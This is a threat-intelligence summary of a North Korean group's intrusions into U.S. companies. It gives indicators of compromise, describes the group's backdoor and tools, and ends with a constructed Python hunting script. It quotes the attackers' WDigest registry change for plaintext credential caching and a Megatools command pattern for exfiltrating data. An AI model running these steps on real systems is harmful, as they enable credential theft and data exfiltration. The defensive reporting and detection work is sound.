Keypoints
- Stonefly (aka Andariel/APT45) is conducting financially motivated intrusions against U.S. private companies.
- Attacks consistently deploy the custom multi-stage backdoor Backdoor.Preft (aka Dtrack/Valefor) with plugin support and multiple persistence mechanisms.
- Credential theft is performed via registry modification to enable plaintext credentials, followed by a custom Mimikatz variant that writes to C:\Windows\Temp\KB0722.log.
- Attackers used additional tools including Nukebot, two distinct keyloggers (SHA256 examples provided), Sliver, Chisel, Plink/PuTTY, Megatools, Snap2HTML, and FRP.
- Chisel and other tunneling/proxy tools were used for C2 and remote access; Megatools was used to exfiltrate data to Mega.nz.
- Operators abused fake and unique code-signing certificates (thumbprints listed) to sign or validate tooling used in the campaign.
MITRE Techniques
- [T1003] Credential Dumping – Used Mimikatz to extract credentials (‘Utilized Mimikatz to dump credentials.’)
- [T1219] Remote Access Tools – Employed Plink and PuTTY for remote access and interactive connections (‘Used Plink and PuTTY for remote access.’)
- [T1041] Exfiltration Over C2 Channel – Data exfiltration performed using Megatools to upload archives to Mega.nz (‘Megatools was used to perform data exfiltration:’)
- [T1071] Application Layer Protocol (Command and Control) – Chisel used to create HTTP/SSH tunnels for C2 and tunneling (‘Utilized Chisel for tunneling and command-and-control operations.’)
Indicators of Compromise
- [File Hash] Backdoor and tool hashes – f64dab23c50e3d131abcc1bdbb35ce9d68a34920dd77677730568c24a84411c5 (Backdoor.Preft), a65cefb3c2ccdb50704b1af1008a1f8c7266aa85bd24aaf21f6eb1ddd5b79c81 (Backdoor.Preft), and 20+ other hashes listed in the report.
- [File Hash] Keylogger samples – 485465f38582377f9496a6c77262670a313d8c6e01fd29a5dbd919b9a40e68d5, d867aaa627389c377a29f01493e9dff517f30db8441bf2ccc8f80c48eaa0bf91 (keyloggers).
- [IP Address] Command-and-control and access hosts – 216.120.201[.]112:443, 51.81.168[.]157:443, and additional Plink-related IPs (e.g., 217.195.153[.]209).
- [Certificate] Observed code-signing/thumbprints – thumbprint “313cffaac3d1576ca3c1cee8f9a68a15a24ff418” (Baramundi Inc.), thumbprint “10b8b939400a59d2cb79fff735796d484394f8dd” (VEXIS SOFTWARE LTD.), used as fake/unique certificates in the campaign.
- [File Names/Paths] Local artifacts and logs – C:\Windows\Temp\KB0722.log (Mimikatz output), 0.log (keylogger), and temporary archives such as sig.rar used with Megatools uploads.
Backdoor.Preft is a multi-stage implant used throughout the campaign: it supports downloading/uploading files, executing commands, and loading plugins of multiple types (EXE, VBS, BAT, shellcode). The backdoor implements several persistence options — Startup .LNK, Windows Service, Registry entries, and Task Scheduler — allowing long-term presence and modular extension via plugins. Operators also deployed Nukebot (a backdoor obtained from leaked source), two distinct clipboard-and-keystroke-stealing keyloggers that log to temporary files (0.log or randomly-named .DAT files), and used Snap2HTML for filesystem snapshots.
Credential access followed a consistent technical pattern: a malicious batch file modified the registry to enable plaintext credential caching (HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1), then a customized Mimikatz binary was run to dump credentials and write results to C:\Windows\Temp\KB0722.log. Keyloggers captured clipboard contents and keystrokes, archiving logs into password-protected ZIPs in temp directories. Lateral access and remote control relied on PuTTY/Plink for SSH connections and Sliver for post-exploitation, with Chisel and FRP used to create tunneled C2 channels over HTTP/SSH.
For data staging and exfiltration the operators used Megatools with a command-line upload to Mega.nz (example pattern: mt.exe put -u [USER] -p [PASS] /Root). C2 infrastructure included TCP/443 endpoints (e.g., 216.120.201[.]112:443, 51.81.168[.]157:443) and multiple malicious binaries with SHA256 indicators. Observed operational tradecraft also included use of fake or unique certificates to sign or validate tooling, and use of known legitimate tools (PuTTY, Plink, Snap2HTML) to blend activity. Detection should prioritize identifying Preft plugin installations, WDigest registry changes, Mimikatz outputs in temp folders, keylogger artifacts (0.log, random .DAT), unusual Megatools activity, and connections to the listed IPs and C2 endpoints.
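As an added hunting example (written here, not code from the Symantec report), the detection priorities above expressed as rules over constructed Sysmon-style events; the event field names, the sample events and the decision to match only the fixed file names (the randomly named .DAT keylogger files need a looser, noisier pattern) are assumptions:

```python
"""Hunt rules for the Stonefly/Preft tradecraft summarised above, run over
constructed Sysmon-style events. Event samples below are made up."""
import re

# Indicators taken from the report summary above.
WDIGEST_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"
C2_ENDPOINTS = {("216.120.201.112", 443), ("51.81.168.157", 443)}
# Mimikatz output and keylogger log in a Temp directory (fixed names only).
ARTIFACT_FILES = re.compile(r"\\temp\\(kb0722\.log|0\.log)$", re.I)
# Megatools upload, e.g. "mt.exe put -u [USER] -p [PASS] /Root".
MEGATOOLS_UPLOAD = re.compile(r"\bmt\.exe\b.*\bput\b", re.I)

def classify(event):
    """Return the names of the rules that fire on one event dict ([] if none)."""
    hits = []
    kind = event.get("type")
    if kind == "registry_set":
        # Sysmon event 13 renders the value as "DWORD (0x00000001)".
        if (event["target"].lower() == WDIGEST_KEY.lower()
                and event["details"].upper() in ("DWORD (0X00000001)", "1")):
            hits.append("wdigest_plaintext_creds_enabled")
    elif kind == "file_create":
        if ARTIFACT_FILES.search(event["target"]):
            hits.append("credential_or_keylogger_artifact")
    elif kind == "process_create":
        if MEGATOOLS_UPLOAD.search(event["cmdline"]):
            hits.append("megatools_upload")
    elif kind == "network_connect":
        if (event["dst_ip"], event["dst_port"]) in C2_ENDPOINTS:
            hits.append("known_c2_endpoint")
    return hits

def hunt(events):
    """Map each firing rule name to the list of events that triggered it."""
    findings = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(rule, []).append(ev)
    return findings

SAMPLE_EVENTS = [  # constructed telemetry, not from a real host
    {"type": "registry_set", "target": WDIGEST_KEY, "details": "DWORD (0x00000001)"},
    {"type": "file_create", "target": r"C:\Windows\Temp\KB0722.log"},
    {"type": "file_create", "target": r"C:\Users\a\AppData\Local\Temp\0.log"},
    {"type": "file_create", "target": r"C:\Windows\Temp\setup.log"},
    {"type": "process_create", "cmdline": "mt.exe put -u [USER] -p [PASS] /Root sig.rar"},
    {"type": "network_connect", "dst_ip": "216.120.201.112", "dst_port": 443},
    {"type": "network_connect", "dst_ip": "10.0.0.5", "dst_port": 443},
]

if __name__ == "__main__":
    for rule, evs in hunt(SAMPLE_EVENTS).items():
        print(rule, len(evs))
```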
Read more: https://symantec-enterprise-blogs.security.com/threat-intelligence/stonefly-north-korea-extortion